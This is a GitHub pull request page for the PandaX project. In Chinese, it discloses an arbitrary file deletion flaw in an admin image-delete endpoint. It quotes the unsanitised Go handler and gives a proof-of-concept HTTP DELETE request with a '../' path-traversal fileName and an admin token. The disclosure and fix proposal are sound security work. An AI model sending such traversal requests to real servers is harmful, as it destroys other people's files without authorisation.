Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

[fix] 修复任意文件删除 #3

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

[fix] 修复任意文件删除 #3

wants to merge 1 commit into from

Conversation

L1nyz-tel
Copy link

No description provided.

@L1nyz-tel
Copy link
Author

L1nyz-tel commented Mar 10, 2024
edited
Loading

pandax 任意文件删除

后台一处接口存在任意文件删除

定位到代码位置 apps/system/router/upload.go#40

PandaX/apps/system/router/upload.go

Lines 40 to 45 in 3d26520

ws.Route(ws.DELETE("/delete").To(func(request *restful.Request, response *restful.Response) {
restfulx.NewReqCtx(request, response).WithLog("删除图片").Handle(s.DeleteImage)
}).
Doc("删除图片").
Metadata(restfulspec.KeyOpenAPITags, tags).
Param(ws.QueryParameter("fileName", "文件名称").DataType("string")))

删除图片的处理函数具体实现为

PandaX/apps/system/api/upload.go

Lines 52 to 57 in 3d26520

func (up *UploadApi) DeleteImage(rc *restfulx.ReqCtx) {
fileName := restfulx.QueryParam(rc, "fileName")
biz.NotEmpty(fileName, "请传要删除的图片名")
err := os.Remove(fmt.Sprintf("%s/%s", filePath, fileName))
biz.ErrIsNil(err, "文件删除失败")
}

这里即可以直接跨目录删除任意文件

DELETE http://127.0.0.1:7788/upload/delete?fileName=../../../../../../../../../tmp/1.txt HTTP/1.1
Host: 127.0.0.1:7788
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Origin: http://127.0.0.1:7788
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySWQiOjEsIlRlbmFudElkIjowLCJPcmdhbml6YXRpb25JZCI6MiwiVXNlck5hbWUiOiJwYW5kYSIsIlJvbGVJZCI6MSwiUm9sZUtleSI6ImFkbWluIiwiRGVwdElkIjowLCJQb3N0SWQiOjQsImV4cCI6MTcxMDU5Mjk1MiwiaXNzIjoiUGFuZGFYIiwibmJmIjoxNzA5OTg3MTUyfQ.tz99RC1K83NjuNVNlw2p2Shq1gS1Y2MVTbbhR1_610Q
If-Modified-Since: Sat, 09 Mar 2024 08:08:22 GMT
Connection: close
Content-Length: 0

# for free to join this conversation on GitHub. Already have an account? # to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@L1nyz-tel